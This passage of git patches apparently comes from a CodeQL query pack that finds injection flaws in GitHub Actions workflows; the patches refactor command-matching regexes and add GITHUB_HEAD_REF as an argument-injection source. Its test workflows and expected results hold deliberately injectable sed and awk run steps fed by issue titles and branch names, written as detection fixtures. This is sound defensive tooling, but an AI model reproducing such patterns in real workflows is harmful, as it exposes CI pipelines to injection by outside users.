.github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | semmle.label | sed "s/FOO/$TITLE/g" | | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | +| .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | subpaths #select From f4581d0aa5e5b1dc0decd50e4ffa39af3e1da758 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 11:36:18 +0200 Subject: [PATCH 0400/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 79545959a7d..e5e89afc471 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.17 +version: 0.1.18 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 30ed4dc6dae..db9bdecf8b8 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.17 +version: 0.1.18 groups: [actions, queries] suites: codeql-suites extractor: javascript From 7a54170b3129ea5facabf0e3fb2a0b98fcebc480 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 12:59:34 +0200 Subject: [PATCH 0401/1267] feat(ext): Move regexp delimiters to Config.qll --- ql/lib/codeql/actions/config/Config.qll | 41 +++++++++++-------- .../actions/security/PoisonableSteps.qll | 11 +---- 2 files changed, 27 insertions(+), 25 deletions(-) diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 8d97e63786b..3b273302fec 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -51,7 +51,11 @@ predicate externallyTriggerableEventsDataModel(string event) { * - regexp: Regular expression for matching poisonable commands */ predicate poisonableCommandsDataModel(string regexp) { - Extensions::poisonableCommandsDataModel(regexp) + exists(string sub_regexp | + Extensions::poisonableCommandsDataModel(sub_regexp) and + // find regexp + regexp = "(^|\\b|\\s+)" + sub_regexp + "(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)" + ) } /** @@ -61,7 +65,26 @@ predicate poisonableCommandsDataModel(string regexp) { * - group: Script capture group number for the regular expression */ predicate poisonableLocalScriptsDataModel(string regexp, int group) { - Extensions::poisonableLocalScriptsDataModel(regexp, group) + exists(string sub_regexp | + Extensions::poisonableLocalScriptsDataModel(sub_regexp, group) and + // capture regexp + regexp = ".*(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$|\\|\\|).*" + ) +} + +/** + * MaD models for arguments to commands that execute the given argument. + * Fields: + * - regexp: Regular expression for matching argument injections. + * - command_group: capture group for the command. + * - argument_group: capture group for the argument. + */ +predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { + exists(string sub_regexp | + Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and + // capture regexp + regexp = ".*(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$|\\|\\|).*" + ) } /** @@ -82,17 +105,3 @@ predicate poisonableActionsDataModel(string action) { predicate untrustedEventPropertiesDataModel(string property, string kind) { Extensions::untrustedEventPropertiesDataModel(property, kind) } - -/** - * MaD models for arguments to commands that execute the given argument. - * Fields: - * - regexp: Regular expression for matching argument injections. - * - command_group: capture group for the command. - * - argument_group: capture group for the argument. - */ -predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { - exists(string sub_regexp | - Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and - regexp = ".*(^|;|\\$\\(|`|\\||&&)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$).*" - ) -} diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 34246fa4e8f..6a218ac08f1 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,12 +18,7 @@ class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - exists( - this.getScript() - .splitAt("\n") - .trim() - .regexpFind("(^|\\b|\\s+)" + regexp + "(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)", _, _) - ) + exists(this.getScript().splitAt("\n").trim().regexpFind(regexp, _, _)) ) } } @@ -46,9 +41,7 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - cmd = - line.regexpCapture(".*(^|;|\\$\\(|`|\\||&&)\\s*" + regexp + "\\s*(;|\\||\\)|`|-|&&|$).*", - group) + cmd = line.regexpCapture(regexp, group) ) } From 89024ad6048ba00083b23b4c8946ec5cd8df4c7d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 22:58:20 +0200 Subject: [PATCH 0402/1267] fix(models): Reuse command delimiter regexps --- ql/lib/codeql/actions/config/Config.qll | 19 ++++++++++++++----- .../security/ArtifactPoisoningQuery.qll | 5 ++++- .../actions/security/PoisonableSteps.qll | 8 +++++--- ql/lib/ext/config/poisonable_steps.yml | 16 ++++++++-------- .../.github/workflows/poisonable_steps.yml | 1 + .../ArgumentInjectionCritical.expected | 2 ++ .../CWE-094/ArgumentInjectionMedium.expected | 1 + 7 files changed, 35 insertions(+), 17 deletions(-) diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 3b273302fec..efd8b26510b 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -45,6 +45,12 @@ predicate externallyTriggerableEventsDataModel(string event) { Extensions::externallyTriggerableEventsDataModel(event) } +private string commandLauncher() { result = ["", "sudo\\s+", "su\\s+", "xvfb-run\\s+"] } + +private string commandPrefixDelimiter() { result = "(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" } + +private string commandSuffixDelimiter() { result = "\\s*(;|\\||\\)|`|&&|\\|\\||$)" } + /** * MaD models for poisonable commands * Fields: @@ -54,7 +60,8 @@ predicate poisonableCommandsDataModel(string regexp) { exists(string sub_regexp | Extensions::poisonableCommandsDataModel(sub_regexp) and // find regexp - regexp = "(^|\\b|\\s+)" + sub_regexp + "(\\s|;|\\||\\)|`|-|&&|[a-zA-Z]|$)" + regexp = + commandPrefixDelimiter() + commandLauncher() + sub_regexp + "(.*?)" + commandSuffixDelimiter() ) } @@ -64,11 +71,13 @@ predicate poisonableCommandsDataModel(string regexp) { * - regexp: Regular expression for matching poisonable local scripts * - group: Script capture group number for the regular expression */ -predicate poisonableLocalScriptsDataModel(string regexp, int group) { +predicate poisonableLocalScriptsDataModel(string regexp, int command_group) { exists(string sub_regexp | - Extensions::poisonableLocalScriptsDataModel(sub_regexp, group) and + Extensions::poisonableLocalScriptsDataModel(sub_regexp, command_group) and // capture regexp - regexp = ".*(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$|\\|\\|).*" + regexp = + ".*" + commandPrefixDelimiter() + commandLauncher() + sub_regexp + commandSuffixDelimiter() + + ".*" ) } @@ -83,7 +92,7 @@ predicate argumentInjectionSinksDataModel(string regexp, int command_group, int exists(string sub_regexp | Extensions::argumentInjectionSinksDataModel(sub_regexp, command_group, argument_group) and // capture regexp - regexp = ".*(^|;|\\$\\(|`|\\||&&|\\|\\|)\\s*" + sub_regexp + "\\s*(;|\\||\\)|`|-|&&|$|\\|\\|).*" + regexp = ".*" + commandPrefixDelimiter() + sub_regexp + commandSuffixDelimiter() + ".*" ) } diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index d2853591d61..dd409bdbae2 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -255,7 +255,10 @@ class ArtifactPoisoningSink extends DataFlow::Node { ) and ( not poisonable instanceof LocalScriptExecutionRunStep or - poisonable.(LocalScriptExecutionRunStep).getCommand().matches(download.getPath() + "%") + poisonable + .(LocalScriptExecutionRunStep) + .getCommand() + .matches(["./", ""] + download.getPath() + "%") ) ) } diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 6a218ac08f1..5dd0081f61e 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -39,9 +39,11 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { string cmd; LocalScriptExecutionRunStep() { - exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | - poisonableLocalScriptsDataModel(regexp, group) and - cmd = line.regexpCapture(regexp, group) + exists(string line, string regexp, int command_group | + line = this.getScript().splitAt("\n").trim() + | + poisonableLocalScriptsDataModel(regexp, command_group) and + cmd = line.regexpCapture(regexp, command_group) ) } diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 07fc7c7af73..7f07f696445 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -57,12 +57,12 @@ extensions: extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` - - ["(\\.\\/)(.*)", 3] - - ["(\\.\\s+)(.*)", 3] # eg: . venv/bin/activate - - ["(source|sh|bash|zsh|fish)\\s+(.*)", 3] - - ["(node)\\s+(.*)(\\.js|\\.ts)", 3] - - ["(python)\\s+(.*)\\.py", 3] - - ["(ruby)\\s+(.*)\\.rb", 3] - - ["(go)\\s+(generate|run)\\s+(.*)\\.go", 4] - - ["(dotnet)\\s+(.*)\\.csproj", 3] + - ["(\\.\\/[a-zA-Z0-9\\-_\\./]+)(.*?)", 2] + - ["(\\.\\s+[a-zA-Z0-9\\-_\\./]+)(.*?)", 2] # eg: . venv/bin/activate + - ["(source|sh|bash|zsh|fish)\\s+(.*?)", 3] + - ["(node)\\s+(.*?)(\\.js|\\.ts)(.*?)", 3] + - ["(python)\\s+(.*?)\\.py(.*?)", 3] + - ["(ruby)\\s+(.*?)\\.rb(.*?)", 3] + - ["(go)\\s+(generate|run)\\s+(.*?)\\.go(.*?)", 4] + - ["(dotnet)\\s+(.*?)\\.csproj(.*?)", 3] diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index 37ec9c9ff71..fad7001ad5a 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -38,3 +38,4 @@ jobs: - run: sed -f config file.txt > foo.txt - run: echo "foo" | awk -f ./config.awk > foo.txt - run: gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo + - run: ./foo/cmd diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected index 13f4954eac3..b5d25bf0d13 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected @@ -9,9 +9,11 @@ nodes | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | +| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | subpaths #select | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:14:14:14:33 | sed "s/FOO/$TITLE/g" | sed | | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | sed | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | sed | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | awk | +| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | sed | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected index 67f728705f4..dfbf87174cc 100644 --- a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected @@ -9,5 +9,6 @@ nodes | .github/workflows/arg_injection.yml:15:14:15:52 | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | semmle.label | echo "foo" \| sed "s/FOO/$TITLE/g" > bar | | .github/workflows/arg_injection.yml:16:14:16:60 | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | semmle.label | echo $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar) | | .github/workflows/arg_injection.yml:17:14:17:33 | awk "BEGIN {$TITLE}" | semmle.label | awk "BEGIN {$TITLE}" | +| .github/workflows/arg_injection.yml:18:14:18:86 | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | semmle.label | sed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json | subpaths #select From 3f8a791b2e5b7a7a82a22b475999c58f56d05112 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 22:59:20 +0200 Subject: [PATCH 0403/1267] fix(queries): Improve Argument Injection query Add GITHUB_HEAD_REF as a source --- .../security/ArgumentInjectionQuery.qll | 29 +++++++++++++++++-- .../security/UntrustedCheckoutQuery.qll | 2 +- .../.github/workflows/arg_injection.yml | 5 ++++ 3 files changed, 32 insertions(+), 4 deletions(-) diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index bf29a1c8458..c13db5b8127 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -23,8 +23,19 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { ArgumentInjectionFromEnvVarSink() { exists(Run run, string var_name | envToArgInjSink(var_name, run, command) and - exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() + run.getScriptScalar() = this.asExpr() and + exists(run.getInScopeEnvVarExpr(var_name)) + ) + or + exists( + Run run, string line, string argument, string regexp, int argument_group, int command_group + | + run.getScript().splitAt("\n") = line and + run.getScriptScalar() = this.asExpr() and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and + argument = line.regexpCapture(regexp, argument_group) and + command = line.regexpCapture(regexp, command_group) and + argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") ) } @@ -45,7 +56,19 @@ class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink { * that is used to construct and evaluate a code script. */ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource + or + exists( + Run run, string argument, string line, string regexp, int command_group, int argument_group + | + run.getScriptScalar() = source.asExpr() and + run.getScript().splitAt("\n") = line and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and + argument = line.regexpCapture(regexp, argument_group) and + argument.regexpMatch(".*\\$(\\{)?(GITHUB_HEAD_REF).*") + ) + } predicate isSink(DataFlow::Node sink) { sink instanceof ArgumentInjectionSink } } diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index a0bf48f9beb..be0229a77c4 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -62,7 +62,7 @@ predicate containsHeadRef(string s) { // heuristics "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bpr_head_ref\\b", // env vars - "\\benv\\.GITHUB_HEAD_REF\\b", + "GITHUB_HEAD_REF", ], _, _) ) } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml index 0956aea61bd..3f2f30a78a0 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -15,3 +15,8 @@ jobs: - run: echo "foo" | sed "s/FOO/$TITLE/g" > bar - run: echo $(echo "foo" | sed "s/FOO/$TITLE/g" > bar) - run: awk "BEGIN {$TITLE}" + - run: sed -i "s/git_branch = .*/git_branch = \"$GITHUB_HEAD_REF\"/" config.json + - run: | + # We consider | as a shell pipe so this one is not reported yet until + # we can better identify all the commands in a shell script + sed -i "s|git_branch = .*|git_branch = \"$GITHUB_HEAD_REF\"|" config.json From c5d31ce08c1d66a7965d79ee805927efd68605d1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Jul 2024 10:13:49 +0200 Subject: [PATCH 0404/1267] fix(refactor): Add comments and rename predicates --- .../codeql/actions/dataflow/ExternalFlow.qll | 43 ++++++++++++------- .../codeql/actions/dataflow/FlowSources.qll | 4 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 35 +++++++-------- .../dataflow/internal/DataFlowPrivate.qll | 18 +++----- .../security/ArgumentInjectionQuery.qll | 2 +- .../actions/security/CodeInjectionQuery.qll | 2 +- .../security/CommandInjectionQuery.qll | 2 +- .../security/EnvPathInjectionQuery.qll | 2 +- .../actions/security/EnvVarInjectionQuery.qll | 2 +- .../actions/security/RequestForgeryQuery.qll | 2 +- .../security/SecretExfiltrationQuery.qll | 2 +- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- 13 files changed, 61 insertions(+), 57 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 2cb8c56b147..1d1b0c6a719 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -10,7 +10,9 @@ private import actions * - output arg: To node (prefixed with either `env.` or `output.`) * - provenance: verification of the model */ -predicate actionsSourceModel(string action, string version, string output, string kind, string provenance) { +predicate actionsSourceModel( + string action, string version, string output, string kind, string provenance +) { Extensions::actionsSourceModel(action, version, output, kind, provenance) } @@ -39,12 +41,17 @@ predicate actionsSummaryModel( * - kind: sink kind * - provenance: verification of the model */ -predicate actionsSinkModel(string action, string version, string input, string kind, string provenance) { +predicate actionsSinkModel( + string action, string version, string input, string kind, string provenance +) { Extensions::actionsSinkModel(action, version, input, kind, provenance) } -predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { - exists(Uses uses, string action, string version, string kind | +/** + * Holds if source.fieldName is a MaD-defined source of a given taint kind. + */ +predicate madSource(DataFlow::Node source, string kind, string fieldName) { + exists(Uses uses, string action, string version | actionsSourceModel(action, version, fieldName, kind, _) and uses.getCallee() = action.toLowerCase() and ( @@ -59,36 +66,40 @@ predicate externallyDefinedSource(DataFlow::Node source, string sourceType, stri if fieldName.trim().matches("output.%") then source.asExpr() = uses else none() - ) and - sourceType = kind + ) ) } -predicate externallyDefinedStoreStep( - DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c -) { +/** + * Holds if the data flow from `pred` to `succ` is a MaD store step. + */ +predicate madStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Uses uses, string action, string version, string input, string output | actionsSummaryModel(action, version, input, output, "taint", _) and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and + // version check ( if version.trim() = "*" then uses.getVersion() = any(string v) else uses.getVersion() = version.trim() ) and + // pred provenance ( - if input.trim().matches("env.%") - then pred.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) - else - if input.trim().matches("input.%") - then pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) - else none() + input.trim().matches("env.%") and + pred.asExpr() = uses.getInScopeEnvVarExpr(input.trim().replaceAll("env.", "")) + or + input.trim().matches("input.%") and + pred.asExpr() = uses.getArgumentExpr(input.trim().replaceAll("input.", "")) ) and succ.asExpr() = uses ) } -predicate externallyDefinedSink(DataFlow::Node sink, string kind) { +/** + * Holds if sink is a MaD-defined sink for a given taint kind. + */ +predicate madSink(DataFlow::Node sink, string kind) { exists(Uses uses, string action, string version, string input | actionsSinkModel(action, version, input, kind, _) and uses.getCallee() = action.toLowerCase() and diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 34f8c76df67..31cf33782b0 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -95,10 +95,10 @@ class GitHubEventJsonSource extends RemoteFlowSource { /** * A Source of untrusted data defined in a MaD specification */ -class ExternallyDefinedSource extends RemoteFlowSource { +class MaDSource extends RemoteFlowSource { string sourceType; - ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } + MaDSource() { madSource(this, sourceType, _) } override string getSourceType() { result = sourceType } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index a40e11bda95..5e624798d69 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -23,14 +23,18 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } -bindingset[var_name, value] -predicate envToRunExpr(string var_name, Run run, string value) { +/** + * Holds if and environment variable is used, directly or indirectly, in a Run's step expression. + * Where the expression is a string captured from the Run's script. + */ +bindingset[var_name, expr] +predicate envToRunExpr(string var_name, Run run, string expr) { // e.g. echo "FOO=$BODY" >> $GITHUB_ENV // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + expr.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV - value.matches("$(echo %") and value.indexOf(var_name) > 0 + expr.matches("$(echo %") and expr.indexOf(var_name) > 0 or // e.g. // FOO=$(echo $BODY) @@ -40,13 +44,18 @@ predicate envToRunExpr(string var_name, Run run, string value) { var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and ( - value.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") + expr.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") or - value.matches("$(echo %") and value.indexOf(var2_name) > 0 + expr.matches("$(echo %") and expr.indexOf(var2_name) > 0 ) ) } +/** + * Holds if an environment variable is used, directly or indirectly, as an argument to a dangerous command + * in a Run step. + * Where the command is a string captured from the Run's script. + */ bindingset[var_name] predicate envToArgInjSink(string var_name, Run run, string command) { exists(string argument, string line, string regexp, int command_group, int argument_group | @@ -131,18 +140,6 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo ) } -// predicate dISABLEDenvToOutputStoreStep( -// DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c -// ) { -// exists(Run run, string var_name, string content, string key, string value | -// writeToGitHubOutput(run, content) and -// extractVariableAndValue(content, key, value) and -// c = any(DataFlow::FieldContent ct | ct.getName() = key) and -// pred.asExpr() = run.getInScopeEnvVarExpr(var_name) and -// succ.asExpr() = run and -// value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") -// ) -// } predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { exists(Run run, string var_name, string content, string key, string value | writeToGitHubEnv(run, content) and @@ -180,7 +177,7 @@ predicate artifactToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataF c = any(DataFlow::FieldContent ct | ct.getName() = key) and download.getAFollowingStep() = run and pred.asExpr() = run.getScriptScalar() and - // we store the taint on the enclosing job since the may not exist an implicit env attribute + // we store the taint on the enclosing job since there may not be an implicit env attribute succ.asExpr() = run.getEnclosingJob() ) } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index ec889f19205..47cd38d47fa 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -86,9 +86,7 @@ class DataFlowCall instanceof Cfg::Node { int totalorder() { none() } /** Gets the location of this call. */ - Location getLocation() { - result = this.getLocation() - } + Location getLocation() { result = this.getLocation() } } /** @@ -119,10 +117,8 @@ class DataFlowCallable instanceof Cfg::CfgScope { /** Gets a best-effort total ordering. */ int totalorder() { none() } - /** Gets the location of this callable. */ - Location getLocation() { - result = this.getLocation() - } + /** Gets the location of this callable. */ + Location getLocation() { result = this.getLocation() } } newtype TReturnKind = TNormalReturn() @@ -225,7 +221,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Uses astFrom, StepsExpression astTo | - externallyDefinedSource(nodeFrom, _, "output." + ["*", astTo.getFieldName()]) and + madSource(nodeFrom, _, "output." + ["*", astTo.getFieldName()]) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getTarget() = astFrom @@ -242,7 +238,7 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { */ predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Uses astFrom, NeedsExpression astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and + madSource(nodeFrom, _, "output." + astTo.getFieldName()) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getTarget() = astFrom @@ -282,7 